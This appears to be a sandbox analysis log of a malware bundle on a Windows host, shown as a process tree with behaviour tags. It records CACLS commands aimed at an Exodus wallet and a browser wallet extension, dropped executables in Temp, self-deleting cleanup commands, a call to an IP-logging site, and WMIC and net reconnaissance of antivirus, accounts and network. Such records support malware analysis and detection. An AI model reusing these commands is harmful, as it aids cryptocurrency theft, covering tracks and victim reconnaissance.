C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E9⤵PID:2132
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:4280
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E10⤵PID:6084
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E9⤵PID:2248
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E10⤵PID:6044
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"9⤵PID:2972
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:5944
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"10⤵PID:5200
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"9⤵PID:4868
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:4784
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"10⤵PID:316
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E9⤵PID:3388
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E10⤵PID:1680
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E9⤵PID:5396
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E10⤵PID:5504
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"9⤵PID:5652
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:3696
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"10⤵PID:1660
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"9⤵PID:5564
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:5440
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:1860
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"10⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5516 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E9⤵PID:2328
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E10⤵PID:5800
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E9⤵
- Executes dropped EXE
PID:3144 -
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E10⤵PID:5304
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Second.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Second.exe8⤵
- Executes dropped EXE
PID:5780 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Second.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Second.exe9⤵PID:4836
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
PID:4288 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9f6d521e_Fri005bb939a12f.exe4⤵PID:3952
-
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9f6d521e_Fri005bb939a12f.exe620ee9f6d521e_Fri005bb939a12f.exe5⤵PID:2800
-
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9f6d521e_Fri005bb939a12f.exe620ee9f6d521e_Fri005bb939a12f.exe6⤵
- Executes dropped EXE
PID:2912 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620eea0052b41_Fri0064244e526.exe4⤵PID:3320
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9f904e5f_Fri008a64a161.exe4⤵PID:3988
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9f8079d0_Fri009b6e1f0f0.exe4⤵
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9f4890f0_Fri00080e80.exe4⤵PID:2216
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9f3162da_Fri00b5daea42.exe /mixtwo4⤵
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9f0f317f_Fri00dfd53221.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9c20f6fc_Fri00f49041.exe4⤵PID:4084
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9c09b72d_Fri00ef1dae.exe4⤵PID:3372
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9bdae9b2_Fri00129f9288f5.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3040
-
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9f8079d0_Fri009b6e1f0f0.exe620ee9f8079d0_Fri009b6e1f0f0.exe1⤵
- Executes dropped EXE
- Checks computer location settings
PID:3348 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\5776870174.exe"2⤵PID:1940
-
C:\Users\Admin\AppData\Local\Temp\5776870174.exe"C:\Users\Admin\AppData\Local\Temp\5776870174.exe"3⤵
- Executes dropped EXE
PID:4344 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6365036327.exe" hbone2⤵PID:4808
-
C:\Users\Admin\AppData\Local\Temp\6365036327.exe"C:\Users\Admin\AppData\Local\Temp\6365036327.exe" hbone3⤵
- Executes dropped EXE
PID:4568 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 6164⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6000 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 6364⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:808 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 6604⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3240 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 6724⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5548 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 7524⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5792 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 8804⤵
- Program crash
PID:4124 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6043857893.exe"2⤵PID:4388
-
C:\Users\Admin\AppData\Local\Temp\6043857893.exe"C:\Users\Admin\AppData\Local\Temp\6043857893.exe"3⤵
- Executes dropped EXE
PID:4948 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 9884⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5176 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "620ee9f8079d0_Fri009b6e1f0f0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9f8079d0_Fri009b6e1f0f0.exe" & exit2⤵PID:4184
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "620ee9f8079d0_Fri009b6e1f0f0.exe" /f3⤵
- Kills process with taskkill
PID:3144 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3348 -s 20922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1464
-
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9c09b72d_Fri00ef1dae.exe620ee9c09b72d_Fri00ef1dae.exe1⤵
- Executes dropped EXE
PID:3848 -
C:\Users\Admin\AppData\Local\Temp\is-78M2A.tmp\620ee9c09b72d_Fri00ef1dae.tmp"C:\Users\Admin\AppData\Local\Temp\is-78M2A.tmp\620ee9c09b72d_Fri00ef1dae.tmp" /SL5="$A0030,870458,780800,C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9c09b72d_Fri00ef1dae.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:3508 -
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9c09b72d_Fri00ef1dae.exe"C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9c09b72d_Fri00ef1dae.exe" /SILENT3⤵PID:3144
-
C:\Users\Admin\AppData\Local\Temp\is-K1OJI.tmp\620ee9c09b72d_Fri00ef1dae.tmp"C:\Users\Admin\AppData\Local\Temp\is-K1OJI.tmp\620ee9c09b72d_Fri00ef1dae.tmp" /SL5="$20204,870458,780800,C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9c09b72d_Fri00ef1dae.exe" /SILENT4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:3248 -
C:\Users\Admin\AppData\Local\Temp\is-UTGT6.tmp\dllhostwin.exe"C:\Users\Admin\AppData\Local\Temp\is-UTGT6.tmp\dllhostwin.exe" 775⤵
- Executes dropped EXE
PID:4576
-
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9f3162da_Fri00b5daea42.exe620ee9f3162da_Fri00b5daea42.exe /mixtwo1⤵
- Executes dropped EXE
- Checks computer location settings
PID:4032 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 6242⤵
- Program crash
PID:4112 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 6322⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4276 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 5882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4684 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 7842⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5184 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 7562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5772 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 9402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2944 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 13042⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4828 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 13082⤵
- Program crash
PID:5424 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "620ee9f3162da_Fri00b5daea42.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9f3162da_Fri00b5daea42.exe" & exit2⤵PID:5748
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "620ee9f3162da_Fri00b5daea42.exe" /f3⤵
- Kills process with taskkill
PID:5464 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 11642⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5832
-
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9bdae9b2_Fri00129f9288f5.exe620ee9bdae9b2_Fri00129f9288f5.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:724 -
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9bdae9b2_Fri00129f9288f5.exe"C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9bdae9b2_Fri00129f9288f5.exe" -a2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3252
-
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9f0f317f_Fri00dfd53221.exe620ee9f0f317f_Fri00dfd53221.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
PID:3196 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\sWmDPTD.CPL",2⤵PID:2596
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\sWmDPTD.CPL",3⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:180
-
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620eea0052b41_Fri0064244e526.exe620eea0052b41_Fri0064244e526.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3204 -
C:\Users\Admin\AppData\Local\Temp\GDMD1.exe"C:\Users\Admin\AppData\Local\Temp\GDMD1.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4904 -
C:\Users\Admin\AppData\Local\Temp\GDMD1.exe"C:\Users\Admin\AppData\Local\Temp\GDMD1.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4896 -
C:\Users\Admin\AppData\Local\Temp\GDMD1.exe"C:\Users\Admin\AppData\Local\Temp\GDMD1.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4860 -
C:\Users\Admin\AppData\Local\Temp\GDMD1.exe"C:\Users\Admin\AppData\Local\Temp\GDMD1.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4932 -
C:\Users\Admin\AppData\Local\Temp\GDMD114JFLI371I.exehttps://iplogger.org/1ypBa72⤵PID:5016
-
C:\Users\Admin\AppData\Local\Temp\GDMD1.exe"C:\Users\Admin\AppData\Local\Temp\GDMD1.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5008 -
C:\Users\Admin\AppData\Local\Temp\GDMD1.exe"C:\Users\Admin\AppData\Local\Temp\GDMD1.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4960
-
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9f4890f0_Fri00080e80.exe620ee9f4890f0_Fri00080e80.exe1⤵
- Executes dropped EXE
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:3952
-
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9f904e5f_Fri008a64a161.exe620ee9f904e5f_Fri008a64a161.exe1⤵
- Executes dropped EXE
PID:2560 -
C:\Users\Admin\AppData\Local\Temp\is-SLD9F.tmp\620ee9f904e5f_Fri008a64a161.tmp"C:\Users\Admin\AppData\Local\Temp\is-SLD9F.tmp\620ee9f904e5f_Fri008a64a161.tmp" /SL5="$90050,140006,56320,C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9f904e5f_Fri008a64a161.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1760 -
C:\Users\Admin\AppData\Local\Temp\is-14IR4.tmp\5(6665____.exe"C:\Users\Admin\AppData\Local\Temp\is-14IR4.tmp\5(6665____.exe" /S /UID=14053⤵
- Executes dropped EXE
PID:4224 -
C:\Windows\system32\fondue.exe"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll4⤵
- Suspicious use of FindShellTrayWindow
PID:4324 -
C:\Windows\system32\OptionalFeatures.EXE"C:\Windows\system32\OptionalFeatures.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll5⤵PID:4756
-
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9c20f6fc_Fri00f49041.exe620ee9c20f6fc_Fri00f49041.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3712
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 3sQFHysDqUKDnplxK/B74w.0.21⤵
- Executes dropped EXE
PID:2800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4032 -ip 40321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1284
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global1⤵
- Process spawned unexpected child process
PID:4572 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global2⤵
- Loads dropped DLL
PID:4640 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 6003⤵
- Program crash
PID:4816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4376 -ip 43761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4632
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4640 -ip 46401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4728
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
PID:4844 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:5040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4032 -ip 40321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4032 -ip 40321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3348 -ip 33481⤵PID:4272
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4032 -ip 40321⤵PID:1236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4032 -ip 40321⤵PID:5688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4568 -ip 45681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4568 -ip 45681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4948 -ip 49481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4032 -ip 40321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5576
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:4532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4568 -ip 45681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4644
-
C:\Users\Admin\AppData\Local\Temp\7A35.exeC:\Users\Admin\AppData\Local\Temp\7A35.exe1⤵PID:5516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4032 -ip 40321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5436
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:2360
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3952
-
C:\Users\Admin\AppData\Local\Temp\960B.exeC:\Users\Admin\AppData\Local\Temp\960B.exe1⤵
- Executes dropped EXE
PID:5760
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4568 -ip 45681⤵PID:1532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4032 -ip 40321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3096
-
C:\Users\Admin\AppData\Local\Temp\CA1C.exeC:\Users\Admin\AppData\Local\Temp\CA1C.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5992 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\CA1C.exe" & exit2⤵PID:2856
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5016 -
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:5432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4568 -ip 45681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4032 -ip 40321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5672
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4568 -ip 45681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4600
-
C:\Windows\system32\cmd.execmd1⤵PID:1460
-
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv2⤵PID:5388
-
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv2⤵PID:4036
-
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv2⤵PID:5000
-
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv2⤵PID:5404
-
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv2⤵PID:5272
-
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv2⤵PID:3296
-
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv2⤵PID:5584
-
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv2⤵PID:5612
-
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5688 -
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv2⤵PID:2140
-
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv2⤵PID:3540
-
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv2⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:3888 -
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv2⤵PID:1384
-
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv2⤵PID:5476
-
C:\Windows\system32\ipconfig.exeipconfig /displaydns2⤵
- Gathers network information
PID:1256 -
C:\Windows\system32\ROUTE.EXEroute print2⤵PID:4976
-
C:\Windows\system32\netsh.exenetsh firewall show state2⤵PID:3496
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:2972 -
C:\Windows\system32\tasklist.exetasklist /v2⤵
- Enumerates processes with tasklist
PID:4680 -
C:\Windows\system32\net.exenet accounts /domain2⤵PID:3416
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 accounts /domain3⤵PID:5192
-
C:\Windows\system32\net.exenet share2⤵PID:3744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 share3⤵PID:5920
-
C:\Windows\system32\net.exenet user2⤵PID:792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user3⤵PID:2328
-
C:\Windows\system32\net.exenet user /domain2⤵PID:5444
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /domain3⤵PID:2440
-
C:\Windows\system32\net.exenet use2⤵PID:4228
-
C:\Windows\system32\net.exenet group2⤵PID:4712
-
